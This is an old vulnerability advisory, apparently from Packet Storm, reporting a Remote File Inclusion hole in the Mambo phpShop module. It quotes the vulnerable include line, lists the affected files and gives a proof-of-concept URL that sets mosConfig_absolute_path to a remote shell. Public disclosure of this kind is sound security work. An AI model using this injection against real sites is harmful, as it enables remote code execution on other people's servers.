phphop.txt

2006-08-27T00:00:00
ID PACKETSTORM:49372
Type packetstorm
Reporter Outlaw
Modified 2006-08-27T00:00:00

Description

                                        
                                            ` ###########################################################################################  
# Aria-Security.net Advisory #  
# Discovered by: O.U.T.L.A.W #   
  
# < www.Aria-security.net > #  
# Gr33t to: A.U.R.A & Hessam-X & Cl0wn & DrtRp #  
# #  
###########################################################################################  
#Software: mambo-phphop Product Scroller Module   
#Attack method: Remote File Inclusion  
  
#Source:  
  
/* Load the phpshop main parse code */  
require_once( $mosConfig_absolute_path.'/components/com_phpshop/phpshop_parser.php' );  
  
  
************************************************************************************  
  
#Vulnarable Files:  
mod_phpshop.php  
mod_phpshop_allinone.php  
mod_phpshop_cart.php  
mod_phpshop_featureprod.php  
mod_phpshop_latestprod.php  
mod_product_categories.php  
mod_productscroller.php  
mosproductsnap.php  
  
  
#Proof of Concept:   
#one of the files above.php?mosConfig_absolute_path=SHELL  
#   
#----------------------------------------------------------   
#   
  
  
#   
#Contact : Outlaw@aria-security.net   
  
`